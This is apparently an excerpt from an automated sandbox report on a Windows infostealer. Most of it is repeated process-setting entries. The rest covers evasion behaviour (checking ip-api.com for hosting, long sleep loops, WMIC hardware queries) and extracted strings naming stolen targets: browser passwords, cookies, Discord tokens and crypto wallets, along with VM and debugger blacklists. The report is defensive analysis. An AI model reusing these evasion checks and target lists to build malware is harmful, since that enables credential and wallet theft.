                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
                      Tries to delay execution (extensive OutputDebugStringW loop)
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeSection loaded: OutputDebugStringW count: 1943
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6792Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2689Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7093Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2465Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4020
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 823
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep count: 6792 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 2689 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep count: 7093 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep count: 2465 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 4020 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 823 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: SecurityHealthSystray.exe, 0000000D.00000002.1523848906.00000267B0C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Handshakemath/randClassINETAuthorityquestionsinfo_hashuser32.dllvmwaretrayxenservicevmwareusermegadumperscyllahidevirtualboxPxmdUOpVyxQ9IATRKPRHPaul Jonesd1bnJkfVlHQarZhrdBpjPC-DANIELEqarzhrdbpjq9iatrkprhd1bnjkfvlhJUDES-DOJOGJAm1NxXVmdOuyo8RV7105KvAUQKPQOf20XqH4VLpxmduopvyxJcOtj17dZxcM0uEGN4do64F2tKIqO5GexwjQdjXGfNBDSlDTXYmcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootlogins.txtLogin DataChrome SxS360BrowserUR BrowserdiscordptbinitiationByHackirbysecure.datauto_startsteam-tempEpic Games.minecraftRiot GamesShowWindow-NoProfileExtensionsExodusWeb3PaliWalletwinsymlink/dev/stdinCreateFileterminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dllexecerrdotSYSTEMROOTavatar_url
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: tznamerdtscppopcntempty rune1 RGBA64Gray16X25519%w%.0wAcceptServercmd/goheaderAnswerLengthSTREETavx512rdrandrdseedwebhookcryptosregeditollydbgdf5servvmusrvctaskmgrqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe pro3u2v9m8SERVER1MIKE-PCNETTYPClisa-pcHEUeRzljohn-pcZELJAVALISA-PCWILEYPCJOHN-PCserver1wileypcAIDANPC7DBgdxuJAW4Dz0cMkNdS6Mr.Nonej7pNjWMequZE3Jo6jdigqKUv3bT4ymONofgheuerzlIVwoKUFavg.comDefaultFirefoxMercuryAddressNetworkCookiesHistorykey4.dbThoriumIridiumVivaldiOrbitumMaxthonK-MelonSputnikSlimjetOperaGXaccountaddressDesktopcontentAppDatadiscordmodulesRoamingversionWindowsFeatherBadlionleveldbAPPDATACaption%.2f GBprofileDiscord`Nitro`.sqlitecmd.exeWallets\ArmoryCoinomiBinanceMartianPhantomSafepalSolfareiWalletLICENSEProtectfloat32float64readdirconsoleabortedCopySidWSARecvWSASendconnectsignal runningPATHEXT_pragmapragma _txlocknumber nil keyUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT19531259765625FreeSidSleepExinvaliduintptrSwapperChanDir Value>Convert\\.\UNCforcegcallocmWcpuprofallocmRunknowngctraceIO waitsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: OpenEventAUnlockFileunrechableno consoleenter-fastRIPEMD-160impossible[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]rune <nil>image: NewBM????res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type TuesdayJanuaryOctoberMUI_StdMUI_DltAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutapdh.dllwindowswsarecvwsasendlookup writetoavx512fSHA-224SHA-256SHA-384SHA-512InstAltInstNopalt -> nop -> any -> NRGBA64tls3desderivedInitialExpiresSubjectcharsetos/execruntimeanswers]?)(.*)Ed25519MD5-RSAserial:eae_prk2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavevmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversalUSERNAMEEIEEIFYEGBQHURCCORXGKKZCoreleepcJBYQTQBOMARCI-PClmVwjj9bGRXNNIIELUCAS-PCjulia-pcXGNSVODUESPNHOOLORELEEPCVONRAHELTMKNGOMUJULIA-PC05h00Gi05ISYH9SHICQja5iTQZSBJVWMUspG1y1CecVtZ5wEBUiA1hkmOZFUCOD6o8yTi52Th7dk1xPrQORxJKNkgL50ksOpSqgFOf3Gj.seancedxd8DJ7clmvwjj9beset.com-CommandDisabled0.0.0.0 Web DataWaterfoxK-MeleonCyberfoxBlackHawUsernamePasswordBrowsers```%s```ChromiumElementsCatalinaQIP SurfpasswordbancairemetamaskdatabasePicturesOneDriveindex.jsSettingssettings.featherNovolinealts.txtPaladiumgames-%s
                      Source: SecurityHealthSystray.exe, 00000016.00000002.1590941085.0000000000281000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
